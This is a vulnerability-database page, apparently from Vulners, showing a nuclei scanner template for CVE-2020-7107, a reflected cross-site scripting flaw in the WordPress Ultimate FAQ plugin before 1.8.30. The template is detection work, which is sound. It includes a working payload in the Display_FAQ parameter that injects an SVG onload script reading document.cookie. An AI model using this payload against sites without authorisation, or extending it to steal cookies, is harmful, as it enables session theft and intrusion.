Lucene search
K

WordPress Ultimate FAQ <1.8.30 - Cross-Site Scripting

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 26 Views

WordPress Ultimate FAQ <1.8.30 - XSS vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
WordPress Ultimate FAQ Cross-Site Scripting Vulnerability
19 Jan 202000:00
cnvd
CVE
CVE-2020-7107
16 Jan 202004:01
cve
Cvelist
CVE-2020-7107
16 Jan 202004:01
cvelist
EUVD
EUVD-2020-28241
7 Oct 202500:30
euvd
NVD
CVE-2020-7107
16 Jan 202005:15
nvd
OSV
CVE-2020-7107
16 Jan 202005:15
osv
Prion
Design/Logic Flaw
16 Jan 202005:15
prion
RedhatCVE
CVE-2020-7107
9 Jan 202610:00
redhatcve
wpexploit
Ultimate FAQ < 1.8.30 - Unauthenticated Reflected XSS
6 Jan 202000:00
wpexploit
WPVulnDB
Ultimate FAQ < 1.8.30 - Unauthenticated Reflected XSS
6 Jan 202000:00
wpvulndb
Rows per page
id: CVE-2020-7107

info:
  name: WordPress Ultimate FAQ <1.8.30 - Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    WordPress Ultimate FAQ plugin before 1.8.30 is susceptible to cross-site scripting via Display_FAQ to Shortcodes/DisplayFAQs.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.
  remediation: Fixed in version 1.8.30.
  reference:
    - https://wpscan.com/vulnerability/5e1cefd5-5369-44bd-aef7-2a382c8d8e33
    - https://wordpress.org/plugins/ultimate-faqs/
    - https://plugins.trac.wordpress.org/changeset/2222959/ultimate-faqs/tags/1.8.30/Shortcodes/DisplayFAQs.php
    - https://nvd.nist.gov/vuln/detail/CVE-2020-7107
    - https://wordpress.org/plugins/ultimate-faqs/#developers
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-7107
    cwe-id: CWE-79
    epss-score: 0.02195
    epss-percentile: 0.80331
    cpe: cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: etoilewebdesign
    product: "ultimate_faq"
    framework: wordpress
  tags: cve,cve2020,ultimate-faqs,wpscan,xss,wordpress,wp-plugin,wp,etoilewebdesign,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/ultimate-faqs/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Ultimate FAQ'
          - 'Tags:'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "'</script><svg/onload=alert(document.cookie)>"
          - "var Display_FAQ_ID ="
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100cb5449b3e598401f9a38df9e59e720a582eb344f4fef49b57894b620f1911a01022100f854bd14db17318704b34b6c93378e430f8bef29dac57444c6481c7a343acaf5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24.3
CVSS 3.16.1
EPSS0.02195
26